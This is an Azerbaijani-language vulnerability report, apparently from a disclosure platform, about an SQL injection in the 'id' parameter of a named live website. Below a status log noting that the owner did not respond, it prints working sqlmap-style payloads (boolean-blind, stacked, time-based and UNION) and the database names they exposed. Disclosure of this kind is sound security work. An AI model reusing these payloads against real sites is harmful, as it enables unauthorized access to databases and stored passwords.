Ətraflı məlumat
Saytda SQL İnjection mövcuddur.
Bu boşluqdan istifadə edərək saytda yerləşdirilmiş məlumatları (Parollar, saytın strukturu və s. əldə etmək olar)
site: ambiancemed.com
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7 AND 9525=9525
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=7;SELECT SLEEP(5)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=7 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-6345 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767071,0x68644a6f727a6a4f624959496e595a767646416e6f47615864685351415061656f6f784d55455870,0x716b626271),NULL,NULL-- lBeb
---
available databases [2]:
[*] apteyfpx_amqiance
[*] information_wchema
Qeydlər
-
23 Yanvar 2017, 13:14
Boşluğun statusu
Mənbədən cavab gəlmədi -
13 Dekabr 2016, 12:04
Boşluğun statusu
Mənbəyə boşluq haqqında e-poçt göndərildi -
13 Dekabr 2016, 11:15
Boşluğun statusu
Moderator tərəfindən təsdiq edildi -
13 Dekabr 2016, 11:01
Boşluğun statusu
Mənbəyə boşluq haqqında e-poçt göndərildi -
11 Dekabr 2016, 11:22
Boşluğa bal verildi
Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 8 bal təyin etdi -
11 Dekabr 2016, 11:10
Boşluğun statusu
Moderator tərəfindən təsdiq edildi -
08 Dekabr 2016, 16:25
Boşluq dəyişdirildi
Boşluq "SQL Injection" dəyişdirildi -
08 Dekabr 2016, 12:17
Boşluq imtina edildi
Saytın ünvanını qeyd edin -
07 Dekabr 2016, 23:18
Boşluq əlavə edildi
Boşluq BUGemota əlavə edildi